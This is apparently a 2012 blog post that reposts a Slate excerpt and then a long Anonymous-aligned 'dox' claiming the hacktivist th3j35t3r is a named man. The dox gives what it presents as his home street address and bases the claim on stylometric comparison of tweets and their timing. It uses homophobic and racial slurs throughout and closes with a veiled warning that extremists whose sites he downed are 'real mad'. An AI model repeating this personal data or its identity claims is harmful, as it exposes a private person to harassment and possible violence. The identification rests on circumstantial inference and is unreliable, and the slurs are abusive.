The very idea of an online campaign to defend “Internet freedom” is problematic. It’s not like an appeal to raise money for a presidential candidate or victims of a natural disaster; it takes more than a few clicks or cash donations. Moreover, the goals and priorities of such a campaign are likely to shift all the time, depending on the political context. Defending “Internet freedom” requires constant interpretation, deliberation, and discrimination between different courses of action. In contrast, online fundraising usually has fixed goals and is amenable to small-scale, granular contributions.

Without greater bureaucratization, formal mechanisms for decision-making, and, more importantly, the capacity to accept responsibility when those decisions bring unfortunate consequences, Anonymous may end up posing as great of a threat to Internet freedom as its main nemesis, the U.S. government.

Source: http://www.slate.com/articles/technology/future_tense/2012/04/internet_freedom_threat_posed_by_hillary_clinton_s_state_department_and_anonymous_.single.html

#InfoSec: If it walks like th3j35t3r and talks like th3j35t3r, its probably TomRyanBlog

UPDATE: Our hero Jake Davis provided some interesting commentary on this subject recently:

I remember seeing IRC logs of you and LulzSec dissing The Jester and saying his tool “XerXeS” is just SlowLoris with Tor… but how did you guys come to this conclusion? How can this be mitigated if his attacks appear to come from so many exit nodes? Just block all Tor exit nodes? I dnt wanna to. :(
“I have no idea how XerXeS or any other DDoS tool actually works, all I know is that the person or people running the character known as The Jester have been doing it successfully for many years with absolutely zero discrepancies, arrests or suspensions. I think that it’s incredibly impressive that The Jester has stuck to the courage of his/her/their convictions for such a large period of time, even though I disagree with some of the political views expressed. I’m a big fan of facilitating alternative realities and The Jester brings us into another world with many sophisticated layers that often make us forget that it’s just a twitter account and a blog, which is a talent few people have. I find the construction of the persona at a granular level far more admirable than the hacking itself, which I obviously don’t approve of.” -via http://ask.fm/DoubleJake

 

>DecryptedMatrix gives voice to PiraX

 

Hello there, th3j35t3r.  We would also like to welcome our fellow Anons, bloggers, and those simply interested in a cyber-culture controversy spanning over two years. We are sure you know why we have called you here. Your recent online behavior has been rather strange, to say the least. We are here for one reason: We want to end you.

We would like to start first by making you comfortable. No more quasi-anonymous pseudonym mumbo-jumbo. Your name is Thomas so we will call you by the name you were given by your mother. We know your name because it was confirmed over a month ago with the following Pastebin paste:   http://pastebin.com/A5iiTAJS  (PiraX Dox continued after paste)
________________________________________________________________________

Q: Are Thomas Ryan and th3j35t3r one and the same person?

tl;dr: Yes. You fucking bet they are. In the words of Oscar Wilde, however, ‘The truth is rarely pure and never simple.’ Thus, if you want the full, uncensored dox on th3j35t3r, you’re going to have to bear with me for the next ten minutes as I tear apart his tissue of lies and disinformation.

Now concentrate, cos here comes the proof…

Warning: Long dox is looooooooong. I trust it will prove to be an enlightening read however, not least for Mr Thomas Ryan of 86 Amber Street, Staten Island NY.


SEE TOM RYAN AS JESTER at DEFCON 19

Filmed at Defcon after observing Tom Ryan post and photograph a note outside the vendor room signed “J.” This photo was tweeted from @th3j35t3r twitter within moments, as was the following: https://i.imgur.com/axth3.jpg
Note the “Black cell paintball” logo on the shirt. BCP is the name of Tom’s Paintball team. Tom hangs on PBnation.com with a kid called j35t3r, which is the likely source for the name, and the first of many plagiarisms.  NOT SUSPICIOUS AT ALL, folks. Nor is it suspicious that the ridiculous attempts to smear me as a secret blackhat/anon/whatever over the last year all come from the same group of six people connected to Tom. The other partner is tentatively identified, but that’s a story for later.

**********

Among the 9,000 names to have been linked with @th3j35t3r, one that keeps cropping up is that of @TomRyanBlog. The dox has been denied by th3j35t3r, but then Sabu repeatedly denied that he was Hector Monsegur, and we all know how that one ended up…

While many Anons have been focused on reverse DNS lookups, port scanning and conventional doxing methods to unmask Jester, no one seems to have tried a simpler technique: writing analysis.

If Tom Ryan (TR) and Jester (J) are one and the same person, it should be easy to tell. They’ve written 3,000 tweets between them. Even the l33t3st of the l33t would struggle to convincingly maintain two separate writing styles over the course of thousands of tweets and numerous blog posts.

For those who are new to the party, here’s an overview of what we know about TR and J:

Both are conservative, right-wing and love their precious military. Both hate #OWS, Wikileaks, Manning and are obsessed with unmasking Anons. Both are fixated with Sabu (still!), Team Pois0n and Cabin Cr3w. Both enjoy love-ins with @AsherahResearch, @AnonymousDown and all the usual trolls.  In short, they’re both neo-con faggots. But are they one and the same faggot, or are they separate fags who happen to be pursuing identical vendettas?

Before we get bogged down in analyzing their writing styles, here’s some lighter tit-bits to get things kick-started:

1. Last year, TR and J both attended Hacker Halted in Miami and DEFCON in Nevada. Based on what we know of the pair’s political leanings and infosec knowledge, that alone automatically narrows them down to less than 5,000 possible suspects.

2. TR and J both like sushi (a trifling detail, but one that helps build a picture of their personalities). TR: “@p0isAn0N not going to the right Pizzaria. If you are in Boston you should be going to BoLoCo for Burritos anyway. And Duozo for Sushi.”
J: “#hackerhalted delegates … Stay clear of Cafe Bastille. Great sushi at Bali Cafe though… Stayin frosty.”

3. Tom Ryan has form for assuming false identities – such as ‘Robin Sage’. See here for the full story:
http://www.darkreading.com/insider-threat/167801100/security/privacy/225702468/index.html

INTERESTING FACT: @RobinSage joined Twitter on 26th December 2009 – exactly one week after @th3j35t3r joined.

The connection between Tom Ryan, Robin Sage and Jester was first brought to my attention by this tweet from @LulzKitten on 29th March 2012:

“Okay, let’s cut the crap, hello @Th3J35t3r aka @TomRyanBlog aka robinsage. Game over. Was fun, at least sometimes. Next nemesis, plox!”
(Note: Direct links to all tweets quoted in this dox can be found cited in the conclusion.) After reading LulzKitten’s tweet, I cast a casual glance over the Twitter feeds of Tom Ryan and Jester, and instantly noticed some similarities between the pair.

The most damning evidence linking TR and J – the smoking gun – will be presented towards the end of this dox, if you can wait that long, but first, let’s perform some writing analysis. After all, if TR and J are the same person, there ought to be some similarities in their writing styles, surely? You betcha. Here we go then:

Anyone who’s followed J on Twitter and read his blog may have noticed that he has a very distinctive writing style. Let’s pick through some of Jester’s trademark phrases, and then see if we can spot them recurring in TR’s tweets:

4. ‘Hmmmm’. Jester likes to say ‘Hmmm’ ‘Errr’ and ‘Ahemmm’ a lot. In fact he likes to say them so much that he even uses these filler phrases in his blog titles, as well as littering his tweets with them. Here’s some examples:

5th April: “@deftpunkz – umm holy shit. I dont know what to say guys, errrr thanks, i think? -”

4th April: “Al-Qaida ‘blacked out’ on the internet (effectively switched off) >>> http://timesofindia.indiatimes.com/tech/news/internet/Al-Qaida-blacked-out-on-internet/articleshow/12529550.cms #infosec #saladin #ahemm”

3rd April: “Now…… imagine…… how many of those listed in my last, were ummmmmm – on the ‘shit list’ – just a thought??? #anonymous”

27th Feb: “#Wikileaks & #anonymous dump 5 million #strafor internal emails obtained by #anonymous last Dec..umm this right here…”

21st March: “Anti-Anonymous hacker threatens to expose them (via MSNBC) http://www.msnbc.com/id/46716942 <<< ummm too late. #military #cyber #security #infosec #DoD”

15th Nov, WordPress blog title: “Occupy Wall Street?? 99%?? Ummm.”

Hmmm, I wonder if Tom Ryan also likes to say ‘Hmmm’? Let’s take a look:

10th April: “How To Prevent Data Leaks From Happening To Your Organization http://zite.to/HCucc8 hmmm…how do you prevent the carbon factor from leaking?”

6th April: “Hmmm So @AnonW0rmer is arrested at 10:30 http://j.mp/HiAASP tweets till 3:32, @ItsKahuna disappears @AnonymousIRC disappears for 4 Day >>>”

15th March: “CSI tonight has a scent of Anonymous. Anthropology professor teaching about Hactivism. Hmmm who came it be?”

11th March: “@kennethlipp hhhmmmm do you think any anons donated money to his reelection campaign?”

7th March: “@CryptKper @v0ld4m0rt you are spot on! Who could that have been? Hmmmmm”

16th Feb: “@agentdarkapple Interesting! Hmmm! I can see why you think I would be L and you would be N. L doesn’t smile like me”

OK, that’s enough Hmming – on to point #5: ‘Tick tock’. Jester loves to say ‘Tick tock’ – it’s one of his favorite phrases. Look:

6th March: “From 3.5 months ago: https://th3j35t3r.wordpress.com/2011/11/19/if-i-am-wrong-ill-say-im-wrong-heres-my-apology/ …… from 1 hour ago …. http://www.foxnews.com/scitech/2012/03/06/hacking-group-lulzsec-swept-up-by-law-enforcement/ tick tock toldya.”

3rd August: “’RT @anonymousabu: @hjjrc @SparkyBlaze Your problem is with a ghost. Someone you can neither find nor stop.’ << you have same problem. #tick”

27th July: “@anonymousabu tick tock.”

24th July: “TICK TOCK. #toldyac2dc37a7d9d3238877a127f2d5171c9d”

21st June: “Tickety Tock…..”

25th June blog entitled LulzSec’s Cloudflare Configuration: “Tickety Tock Tock.”

Why, isn’t that a quirky little phrase? I wonder if Captain Hook – sorry, Tom Ryan – also uses the same terminology. Oh, what’s this we have here from 27th Feb?

“#Anonymous I am working on my big release. Hmmmm who should it goto? Tick Tock”

There’s even a ‘Hmmmm’ thrown in for good measure. How Jester-esque!

With a nudge and a wink, we move onto #6: Jester loves nothing more than to sign off his tweets with a sly wink. Just like so:

28th March: “@wwpinc – just in case you were not aware: >>> https://th3j35t3r.wordpress.com/support/ <<< – keep up the great work ;-) Peace. #pgr #wwp #woundedwarrior”

26th March: “Al-Qaida forums crippled in suspected cyber intervention http://j.mp/GSd8ih << bad things happen to bad people, apparently ;-) #infosec”

11th March: “@RepDanGordon @FBIPressOffice I merely stated u were on the list, u seem awful jittery. U need to calm down >> ;-)”

2nd Oct: “RT: @mach2600 @th3j35t3r It’s wobbling … up, down, up, down… <<< gotta love NGINX – always somethin huh ;-)”

16th June: “standby for supporting clarification on http://th3j35t3r.wordpress.com/2011/06/16/quick-n-dirty-just-for-clarification/?utm_source=Jesters+Court+Blog&utm_medium=twitter – close ya eyes if ya already saw it yesterday. ;-)”

2nd June: “http://www.foxnews.com/scitech/2011/06/02/pentagon-has-secret-list-cyber-weapons/ – #justsayin ;-) #oorah”

Now it’s TR’s turn to have a sly wink:

5th April: “The beauty of data-mining in a social world, I don’t need to be connected to you, so you can’t block me. You just need to be on my radar ;-)”

5th April: “@x_ryujin_x @render64 @bitchiest @kalyptonet think of what full dox did for Sabu ;-)”

4th April: “@LauraWalkerKC @BobbyCarbon @NavySEALsORG @Packetknife @HonorThem You should record it ;-)”

14th March: “To Geeks & Nerds 3/14 is known as Pi Day http://www.youtube.com/watch?v=JTZtuMdkUks To Horny Men it’s known as Steak & Blow Job Day! The GF reminded me ;-)”

13th March: “@JackalAnon warned #Anonymous 2 Days Ago about OAuth and Apps. We’ve warned you about TOR. ;-)”

14th Feb: “Why I’m Glad My Boyfriend Isn’t On Facebook – Forbes http://j.mp/z9XNrP by @kashhill | Leaving Facebook made me never want to go back ;-)”

Next up, it’s similarity #7 – ‘Stay Frosty’. This, Jester’s catchiest of catch-phrases, crops up all over his tweets:

2nd April: “http://www.cbsnews.com/2100-202_162-20075647.html <<< still going on about this? Stay frosty and have a Cupcake??”

10th Nov: “#stayfrosty -Word of advice 2 @barrettbrownlol: Just because you’re paranoid doesn’t mean they aren’t out to get you. >”

26th Oct: “#hackerhalted left a little something under the projector in Alhambra SCADA room. Tweet me a photo of what’s there. #stayfrosty”

25th Oct: “#hackerhalted delegates … Stay clear of Cafe Bastille. Great sushi at Bali Cafe though… Stayin frosty.”

Now let’s see what Monsieur Ryan has to say for himself:

10th April: “Iran plans to unplug the Internet, launch its own “clean” alternative http://zite.to/Iqm1Ba#anonymous @CabinCr3w Stay Frosty ;-)”

16th March: “@testeux1 Class on Strategy? I can teach one at The Spy Museum in DC @wikileaks @revmagdalen@AnonymousIRC @YourAnonNews Stay Frosty ;-)”

13th March: “#Anonymous in your time of fear those of you that have used delete.twitlan / tweeteraser / twitwipe A Special Thank You!!! Stay Frosty! ;-)”

13th March: “@jackie_singh @krypt3ia I was promoted today to Brigadier General Packet of The Cyber Brigade@th3j35t3r now reports to me! Stay Frosty ;-)”

12th March: “Finch + Reese = ;-) …. Stay Frosty & Watch Your 6!”

Hang on a sec, isn’t it a bit, well, *obvious* for Tom Ryan to be liberally dropping Jester’s favorite catchphrase into his tweets? Yep, you’re right – it’s very obvious. But here’s the thing: the AntiSec dox that named Jester as Tom Ryan landed in Pastebin on 11th March. Notice how TR deliberately goes out of his way to play up to the ‘Stay Frosty’ caricature in the ensuing days? That’s because he realizes that the more he pretends to be Jester, the more people will be inclined to write him off as just another Jester wannabe. For another example of this tactic, here’s how J tweets every time he downs a Muslim extremist website:

1st March: “http://www.rjfront.info – TANGO DOWN. Temporarily. For enabling recruitment, & co-ordination of jihadist terror cells via web.”

1st March: “http://www.atahadi.com – TANGO DOWN. Temporarily. For online incitement to cause young muslims to carry out acts of violent jihad.”

Exactly one month later, on 1st April, TR tweets the following:

“www.ic3 .gov – TANGO DOWN. Temporarily. For not doing your job, & not arresting #Anonymous”

And: “www.fbi .gov – TANGO DOWN. Temporarily. For enabling recruitment, & co-ordination of#Anonymous via web.”

At this point, obvious troll is obvious – within days of LulzKitten’s tweet linking Tom Ryan and Jester, TR goes out of his way to tweet ‘Stay Frostys’, Jester winks and ‘TANGO DOWN’s. To give him credit, it’s a pretty smart way to make people think you’re nothing more than a Jester fanboy. Sadly for Thomas, it’s too late; the evidence linking Tom Ryan to Jester began from the moment TR began tweeting in January 2012. Prior to AntiSec dropping Jester’s dox on 11th March, Tom Ryan had only tweeted ‘Stay Frosty’ twice in three months. Immediately afterward, he tweets it five times in four days – complete with the Jester’s trademark wink.

So does that mean that all of the foregoing information is part of an elaborate ploy, cooked up by Tom Ryan and Jester, to obfuscate the identity of the real Jester? In the case of the ‘Stay Frostys’ and the ‘TANGO DOWN’s, yes, it probably is. Thankfully, there are dozens of other textual similarities between the pair – similarities that are too subtle to be part of a pre-planned disinformation campaign.

Which leads nicely on to point #8: ‘Much’. Note the phrase that appears in the following tweets from Jester:

18th June: “http://www.techhomethebacon.com/news/hacking-infosec/th3j35t3r-links-nakomis-to-lulzsec-group-cover-up-ensues.html – backpeddaling much? Hacked? lol. -”

18th June: “Back-pedalling much?https://twitter.com/#!/Anonakomis/status/81862870664609792 #js”

August 21st WordPress blog entitled If ya can’t beat em, make some shit up??? LMAO!: “coincidence much?” “projection much??”

I wonder if TR ever lets slip a similar phrase? Oh, what’s this?:
14th March: “@kaepora Nadim, delete much? You’re in the snitch crew ?https://twitter.com/#!/realytcracker/status/143411708369715201 of @Anonymousabu & @ioerror”

Coincidence much?

#9: Jester loves to leave trailing dots in his tweets:

9th April: “<<< drums fingers on desk….”

3rd April: “Now…… imagine…… how many of those listed in my last, were ummmmmm – on the ‘shit list’ – just a thought??? #anonymous”

22nd November: “AFK…….”

He also uses trailing dots when he’s typing live into Notepad in this YouTube video: http://www.youtube.com/watch?v=WeO44IWlkfU

More of Jester’s ‘trailing dots’ tweets are cited at the end of this dox. Now it’s TR’s turn to deploy this tactic:

6th April: “@kennethlipp that’s how it went down with Barrett Brown too. Remember they ended up going to every address for him….according to him”

5th April: “@Bitchiest @KalyptoNet @TomRyanBlog The Secretary disavows this tweet and everybody in it…”

4th April: “#Anonymous ever wonder why certain high ups in your collective are never V& …. Look at cases that never went to court & who has relocated”

Again, more examples of this idiosyncrasy can be found cited at the end of this dox, as well as liberally scattered throughout Tom Ryan’s Twitter feed.

#10: Arrows. Jester loves to use arrows to break up words in his tweets, <<just like this>>:

9th April: “”@VizFoSho: @th3j35t3r dun goofedhttp://www.picvalley.net/u/1980/407013641289457528133400533586itAR4VE93lm7DAkGd2.PNG@RepDan_Gordon” <<< Shit ya got me! What am I to do? Btw now I am near north pole.”

28th March: “@wwpinc – just in case you were not aware: >>>https://th3j35t3r.wordpress.com/support/ <<< – keep up the great work ;-) Peace. #pgr #wwp#woundedwarrior”

Now TR:

6th April: “Hmmm So @AnonW0rmer is arrested at 10:30http://j.mp/HiAASP tweets till 3:32, @ItsKahunadisappears @AnonymousIRC disappears for 4 Day >>>”

13th March: “Don’t know whether to laugh or feel bad but come on: (compatible;+MSIE+6.0;+Windows+98;+Win+9×4.90) << In This Day An Age??”

9th March: “conspiracy 1. a plan or agreement to carry out an illegal or harmful act 2. the act of making such plans >> aka #Anonymous Ops #justsayin<<”

Glance through their tweets and you’ll see that J and TR use <<arrows>> all the time.

#10: UPPER CASE. Compare the tweets of J and TR and you’ll notice that they both love to highlight single words in capitals. Jester first:

9th April: “WARNING: Tweeps in mirror are closer than they appear.”

18th March: “I’m still asked WHY I hit #wikileaks, skip to 28mins 12secs & Major TJ O’Connor abt sums it uphttp://www.youtube.com/watch?v=buY3I4PkK98<<worth watching it all.”

11th March: “@repdangordon be advised, when u file ur complaint to feds, they ARE going need ur cell for forensics to determine IF I hacked u at all ;-( ”

Tom Ryan’s turn:

5th April: “INTERESTING: What is this ugly brown stain on a Key Member of Anonymous’ back? I need to do my cropping for the new site launch. Peace!”

5th April: “#Anonymous why so many military and sovereign citizen connections? GOD I aam glad I took 2 weeks to lay low.”

4th April: “@MaxVenator Too cold and windy for the Hamptons BUT you gave me a good idea. Maybe we can turn Plum Island into a resort for#Anonymous”

Jester and Tom Ryan both use this technique DOZENS of times in their tweets.

#11 features a more subtle similarity between our Jester and our Clown:

Jester, 21st August: “If ya can’t beat em, make some shit up??? LMAO! -”

TR, 16th March: “@exiledsurfer ROFLMAO! Reminds me of being in Bahrain & Abu Dhabi hearing Garth Brooks “Friends in Low Places””

Jester and Thomas don’t always laugh their asses off, but when they do, you can bet it’s in upper case with an exclamation mark at the end. (More examples, as always, are cited in the conclusion of this dox.)

#12: J and TR aren’t very good at spelling. They struggle especially with words such as ‘its’ and ‘it’s’. Jester’s tweets aren’t usually too bad for typos, as he doesn’t rush them (because he knows they will be analyzed by a wide range of foes who might otherwise have cause to mock him for his poor grammar). He also has the autocorrect on his Android phone to help him. He still struggles with those pesky apostrophes that autocorrect can’t pick up however, especially when he tweets from his desktop:

6th March: “WTF is Wikileaks gonna do now it’s source of illegally obtained private info (anon/lulz) has had it’s head & skillset removed? #2birds1Stone”

21st June: “Seems almost as if ‘somebody’ doesn’t want you to see my last link – here’s a pastebin of it’s content.”

In his WordPress blog however, Jester often mixes up his apostrophes, especially in words such as ‘its’:

“With Netcat listening at the other end for incoming connections, you can configure it to execute it’s own script when it receives a connection for example to send a Message of the Day to the connecting device, you would run netcat like this on your server”

Watch his two YouTube videos (links cited at the end) in which he types directly into Notepad and you’ll see he also fails to put apostrophes into words such as ‘lets’, ‘its’ and ‘Thats’. Skip to 2:20 in his XerXes DoS Attack video and you’ll see that the text displayed on Jester’s self-designed software also contains typos: ‘SUCCESFULLY’ should have two ‘s’ in the middle, while at 2:29, you’ll see that ‘Secured’ has also been spelt wrongly. At 6:52 he also makes the same error when typing into Notepad.

Does Tom Ryan fare any better in the spelling stakes? No. In fact he’s even worse when it comes to tweeting typos. That’s because Thomas tweets ten times as frequently as Jester, tweets more hastily (lots of rushed replies to his Twitter buddies) and because he writes the tweets on his Mac, which doesn’t autocorrect his mistakes. Look:

4th April: “@AdrianChen surprised your not all over the@Anonw0rmer arrest and shortly after the disappearance of @itskahuna”

5th April: “To those I owe something too, It’s on it’s way!”

30th March: “RED ALERT: tomorrow is #NoClick31 just as a precaution. Rumor has it #Anonymous is using it’s Porn Bots for #opBlackout click to DDOS attack”

Wanna see more? Just read his tweets.

OK, we’ve almost reached the really juicy stuff linking Jester and Thomas, but first there are a couple more writing similarities to rattle through:

#13: J and TR write numbers numerically rather than alphabetically – even when composing short tweets.

Jester, 28th Feb: “4 more Anons V&’ed http://tinyurl.com/8a2g5k5#anonymous”

10th Nov: “#stayfrosty -Word of advice 2 @barrettbrownlol: Just because you’re paranoid doesn’t mean they aren’t out to get you. >”

27th November: “#saladin (XerXes bro)- ‘the best weapon is the one u never have 2 fire…I prefer the weapon u only need 2 fire once.’”

20th July: “Never saw a wild thing sorry 4 itself. Small bird drop frozen dead from bough without ever having felt sorry 4 itself.”

TR – yep, you’ve guessed it – does exactly the same:

5th April: “@ohmylulz will with 2 False Positives.@missarahnicole @AsherahResearch”

4th April: “Ruh roh! A certain key #Anonymous member disappears for 4 days then reappears. We know what that means.”

3rd April: “@Ihazcandy I should start digging into them. Since I have 2 weeks of downtime.”

OK, moving on (we’re nearly done, I promise) to #14: Hashtags. If you go to tweetstats.com and enter TR and J’s twitter names into separate windows, a series of pretty graphs will be generated that will allow you to compare their tweeting patterns. You’ll notice that they tweet from separate devices, to eliminate the possibility of accidentally tweeting to the wrong account – Tom Ryan likes to keep his iPhone in one pocket and his Android in the other for when he’s playing Jester. Click on the Tweet Cloud tab at the top of the page and you’ll be able to view the most frequent hashtags used by both parties. Not too surprisingly, given their obsession with all things masked, it’s #anonymous. There are also three other hashtags that the pair use prominently however – #fail, #justsayin and #infosec. The latter one is understandable, but the other two? Interesting. Let’s see some #fail and #justsayin in action, starting with Jester:

3rd November: “#opcartel #anonymous You should really listen to what this man has to say. Remember your track record is full of #fail”

15th August: “@anonymousabu U R #fail. U hurt who u claim to fight for (lol), u have agenda < http://reg.cx/1Qps& the agenda is >”

14th August: “So @landrytom u finally got ur mention. Damn u zeroed my ‘xchat’? Please all check out his timeline. Then ask him where is the pwnage? #fail”

29th July: “1st up: My doxing. That’s a #fail. (again) I have never been Ryan Berg, John Willander, Robin Jackson, Anthony Freed, Beau Colvin. #opFrosty”

2nd June: “http://www.foxnews.com/scitech/2011/06/02/pentagon-has-secret-list-cyber-weapons/ – #justsayin;-) #oorah”

Now it’s Tom Ryan’s turn to #Fail (#Justsayin):

5th April: “@agentdarkapple @AsherahResearch she’s definitely is no @elizadushku , Mila Kunis or Megan Ackerman. So she’s a #Fail”

2nd April: “@subverzo TY for verifying 2 alternate personas yours & @CrappyTires . FYI, Everyone in the CT world knows Shumukh al-Islam Forum. #FAIL”

9th March: “@AnonymousIRC you do know they rig cases to#FAIL inorder to capture bigger FISH ….. Right?@atopiary @lolspoon @AnonymouSabu”

9th Feb: “Dangerous Tweets: Arrested, fined in 140 characters or less http://j.mp/yWAV4G << What ever happened to contextual analysis? another#Fail” (Note the classic Jester-style arrows used in this tweet as well.)

10th March: “#anonymous remember threatening people or family members can lead to several crimes. If they are harmed it becomes much worse. #justsayin”

9th March: “conspiracy 1. a plan or agreement to carry out an illegal or harmful act 2. the act of making such plans >> aka #Anonymous Ops #justsayin<<”

Plenty more examples, as always, can be found cited in the footnotes at the end of this dox.

OK, here endeth the writing analysis lesson. Thank you for your patience :) It would be fair to say we’ve established that Jester and Tom Ryan tweet in an uncannily similar manner, but that’s not all. Now we get on to the really good shit…

#15: Tweet times. Using tweetstats.com, it’s possible to compare the times at which J and TR tweet. A quick glance at their respective Tweet Density graphs reveals a similar pattern: neither of them tweets between 3am and 7am EST: they’re both East coast bitches. Interesting.

#16: A few days ago, @VizFoSho tweeted the following image:

http://www.picvalley.net/u/1980/407013641289457528133400533586itAR4VE93lm7DAkGd2.PNG

It depicts two Jester tweets from 7th April, both geo-stamped with Atlantic City, NJ on them. Atlantic City is within 150 miles of NY, where Tom Ryan lives. On 26th March, Jester also posted a single tweet from New York: https://twitter.com/#!/th3j35t3r/status/184333789697282048

Normally, Jester’s tweets don’t reveal his location. Up until April 2012, there had only been four instances in which Jester’s tweets revealed his location – and two of those occurred when he was at DEFCON Nevada and Hacker Halted in Miami, occasions when he was undoubtedly eager to reveal his location in order to prove he was in attendance. Were the New York and Atlantic City revelations accidental (Tor for Android not working properly perhaps?) or was Jester trying to provide more misinformation?

After @VizFoSho pointed out the NJ link (the NY slip-up had gone unnoticed), Jester went out of his way to post two tweets from ridiculously exotic locations – Cape Town on 9th April and then Hawaii on 10th April:

https://twitter.com/#!/th3j35t3r/status/189464600318722049
https://twitter.com/#!/th3j35t3r/status/189464600318722049 “The octopus here is amazing. Dontcha think :-)”

Jester has never previously switched his location to a far-flung location purely for the lulz. Why should he suddenly be trying so hard now that he’s been identified as an East coast slacker? If he’s not Tom Ryan, why should he be bothered if people think he’s from NJ or NY?

On 4th April, Jester made the second of his two Atlantic City tweets at 4:03pm. 11 minutes earlier, Tom Ryan had also posted a tweet. For the next 48 hours, neither account tweeted – a rare occurrence, especially for TR who averages over 30 tweets a day. Enjoying a couple of days in Atlantic City playing the slots, perhaps?

Here are the 4th April tweets from both parties:

https://twitter.com/#!/th3j35t3r/status/187610604314431488

https://twitter.com/#!/th3j35t3r/status/187616455762784257

https://twitter.com/#!/TomRyanBlog/status/187612824187584512

Curiouser and curiouser. But that’s not all. On 23rd March, TR tweets:

“Headed to South Beach to enjoy this great weather! Later Tweeps!”

https://twitter.com/#!/TomRyanBlog/status/183199880922148864

For the next 48 hours, Jester and Tom Ryan are both absent from Twitter.

A month earlier, on 17th February, the same thing happens after TR tweets:

“Off the Grid for a few days ! Have a great 3 day weekend!”

https://twitter.com/#%21/TomRyanBlog/status/170321854723129344

For the next four days, neither party tweets. The first person to break the Twitter silence is Jester, and it’s another rare instance of him revealing his location – Arlington VA.
https://twitter.com/#!/th3j35t3r/status/172077181051219968
Enjoy your three-day weekend, Thomas?

I stated earlier that until April Jester had never previously switched his location to a far-flung country, but I lied – there IS actually one occasion when Jester appeared to be out of the country. On 25th January, he posted the following tweet:

“To all who have DM’ed asking after my whereabouts & welfare…am safe & limbering up. It’s a brave new year. TY 4 support. Stay Frosty.”
https://twitter.com/#!/th3j35t3r/status/162261098035298304

His alleged location? Brescia, Italy. What about Thomas Ryan – what was he up to around this time? Well here’s the thing: between 23rd and 26th January, TR (a man who likes to tweet all day, erryday) doesn’t post a single tweet. Too busy enjoying the bruschetta, washed down with a bottle of Barolo perhaps?

A final word on correlating Twitter times before we move onto our final two points: take a look at the timeline for Jester and Tom Ryan’s tweets. Notice how they often tweet at almost exactly the same time as one another? For example, take Tuesday 10th April. After two hours without activity from either account, Thomas posts the following at 15:30pm:
“Now I feel really special. Someone created a hidden stream about me and monitors it.”
One minute later, at 15:31, Jester tweets “@alemarahweb‏ – ‎http://www.alemara1.com‏ – TANGO DOWN – أنا كنت”
Observe any two Twitter accounts for long enough and you’ll find timing coincidences of course. However, compare Jester and Tom Ryan’s accounts on any given day and you’ll spot a predictable pattern: they always broadly correlate i.e. there is a short burst of tweets, followed by a 45 minute break while Jester/Ryan goes for a wank or to chow down some beef jerky.

Right, two more points to raise and then I’ll leave you in peace:

#17: When LulzKitten tweeted Jester’s dox on 29th March, how did Tom Ryan – the man with the military wallpaper on his Twitter page – respond? “@J_P_Holloway @lulzkitten @YourAnonNewsyou guys really suck at DOXing thinking I am@th3j35t3r everyone knows I was never in the Army #fail”
https://twitter.com/#!/TomRyanBlog/status/185189598677319680

Two things stand out here: firstly, we have no way of knowing that Jester was in the army. Yes, he has an interest in all things military, but the rumor that he actively served in the army is widely believed to be false.

On 13th March however, TR tweeted the following: “When I was in the military, Greenpeace would try to board Aircraft Carriers. Some things aren’t smart & never thought of till it’s too late.”
https://twitter.com/#!/TomRyanBlog/status/179637065154170880

Military, shmilitary; does anyone see a connection here? Thought so. Without further ado, let’s proceed to our final, fateful tweet of interest. On 10th February, Thomas Ryan tweeted the following:

“I wonder if operating Multiple Personas has ever given anyone Multiple Personality Disorder.”

I don’t know Jester, you tell me ;) Tick tock. No response? Oh well, Stay Frosty…

**********

POSTSCRIPT: Could it be that Tom Ryan is such an attention-whore that he’s trolling us all in the hope of being mistaken for the Jester? I guess it’s technically possible, but if so, it’s the most elaborate and painstaking trolling campaign ever conceived – and one that would have to involve the collusion of both parties. If, by some miracle, Thomas Ryan is not Jester, he knows exactly who Jester is – to the extent where he probably even vacations with him. When you review all the evidence however, there can only be one logical conclusion to draw: they are one and the same person.

On 13th March, Tom Ryan posted the following poignant message: “@ArtByAlida although Anonymous doesn’t like@th3j35t3r I do. It’s safer that certain people are never doxed.”
https://twitter.com/#!/TomRyanBlog/status/179636120710152192

You’re right Tom – it would be safer, but the truth always comes out in the wash, don’t you find? I hope you’ve got a few passports lying around, cos you’re gonna need them. Remember those Muslim extremists whose websites you downed and whose threats you retweeted? Oh, they mad. They real mad.

One last thought before I shovel the dirt over Jester’s shriveled corpse: I notice that your Twitter nick is Boondock Saint, in tribute to The Boondock Saints, a movie about two Irish vigilantes. Just out of interest, I wonder what The Internet Surname Database would make of Thomas Ryan’s moniker?

http://www.surnamedb.com/Surname/Ryan

Why, they appear to believe that Ryan is an Irish surname. To quote from my favorite hacktivist for good, ‘Coincidence much?’

Congratulations Thomas; you just got pwned by an amateur who doesn’t even have the skills to label himself a skid, never mind a hacker. Butthurt much?

In the words of your nemesis, @anonymouSabu, “Nigga, troll harder.”

pwned by @spoolfiend

**********

Citations:

LulzKitten tweet linking TR and J: https://twitter.com/?utm_medium=twitter&utm_source=twitterfeed#!/YourAnonNews/statuses/185150794079809536

Check when th3j35t3r and RobinSage joined Twitter: http://www.whendidyoujointwitter.com/

TR’s LinkedIn (where you’ll see proof that he attended Hacker Halted and DEFCON last year): http://www.linkedin.com/in/tommyryan

TR and J professing their love of sushi:
https://twitter.com/#!/TomRyanBlog/status/178202424056610817
https://twitter.com/#!/th3j35t3r/status/128849629939892224

Tom Ryan dox by AntiSec: http://pastebin.com/ZAxBWKi8

J likes to say ‘Hmmm’ a lot:

https://twitter.com/#!/th3j35t3r/status/187996120180457472

Occupy Wall Street?? 99%?? Ummm.

https://twitter.com/#!/th3j35t3r/status/186958030791905282

https://twitter.com/#!/th3j35t3r/status/174163673940631552

https://twitter.com/#!/th3j35t3r/status/182268058168082432

https://twitter.com/#!/th3j35t3r/status/187535767843778560

TR also likes to say ‘Hmmm’:

https://twitter.com/#!/TomRyanBlog/status/188096685250068480

https://twitter.com/#!/TomRyanBlog/status/180117386291195906

https://twitter.com/#!/TomRyanBlog/status/178896960546287617

https://twitter.com/#!/TomRyanBlog/status/177482894443417600

https://twitter.com/#!/TomRyanBlog/status/170195932388925441

https://twitter.com/#!/TomRyanBlog/status/189680060863754241

J goes ‘Tick tock’:

https://twitter.com/#!/th3j35t3r/status/96268183723450369

https://twitter.com/#!/th3j35t3r/status/177033974324002816

https://twitter.com/#!/th3j35t3r/status/83145887307677696

https://twitter.com/#!/th3j35t3r/status/95195869921554433

https://twitter.com/#!/th3j35t3r/status/98828156663889920

Lulzsec’s CloudFlare Configuration

TR goes ‘Tick tock’:

